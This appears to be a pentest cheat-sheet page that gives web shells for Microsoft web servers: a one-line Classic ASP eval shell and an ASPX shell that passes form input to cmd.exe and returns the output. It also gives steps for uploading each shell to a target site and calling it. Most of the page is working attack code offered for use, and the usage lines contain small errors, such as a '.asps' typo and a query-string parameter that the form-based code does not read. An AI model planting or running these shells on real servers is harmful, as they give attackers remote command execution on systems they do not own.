.NET WEB SHELL

ASP

root@oco:~$ nano dotNetShell.asp
 <% eval request('cmd') %>
 * NOTE: ASP.NET uses .aspx extension, but it doesn't support inline eval or similar dynamic code execution in the same way as Classic ASP
root@oco:~$ BROWSER > {targetSite:port} > upload

#usage
root@oco:~$ BROWSER > {targetSite:port}/uploads/dotNetShell.asp?cmd=id
 * try using the source code view [CTRL+U] when executing these
 * the source-view shows the command output as it would be shown in the terminal, without any HTML rendering

ASP.NET

root@oco:~$ nano dotNetShell.aspx
<%
if (IsPostBack && !string.IsNullOrEmpty(Request.Form["cmd"]))
{
    try
    {
        string command = Request.Form["cmd"];

        System.Diagnostics.ProcessStartInfo processInfo = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + command);
        processInfo.RedirectStandardOutput = true;
        processInfo.RedirectStandardError = true;
        processInfo.UseShellExecute = false;
        processInfo.CreateNoWindow = true;

        using (System.Diagnostics.Process process = System.Diagnostics.Process.Start(processInfo))
        {
            string output = process.StandardOutput.ReadToEnd();
            string error = process.StandardError.ReadToEnd();
            process.WaitForExit();

            Response.Write("<strong>Output:</strong><br/>" + output.Replace("\n", "<br/>") + "<br/><strong>Error:</strong><br/>" + error.Replace("\n", "<br/>"));
        }
    }
    catch (Exception ex)
    {
        Response.Write("<strong>Error:</strong> " + ex.Message);
    }
}
%>

root@oco:~$ BROWSER > {targetSite:port} > upload

#usage
root@oco:~$ BROWSER > {targetSite:port}/uploads/dotNetShell.asps?cmd=id
 * try using the source code view [CTRL+U] when executing these
 * the source-view shows the command output as it would be shown in the terminal, without any HTML rendering

Last updated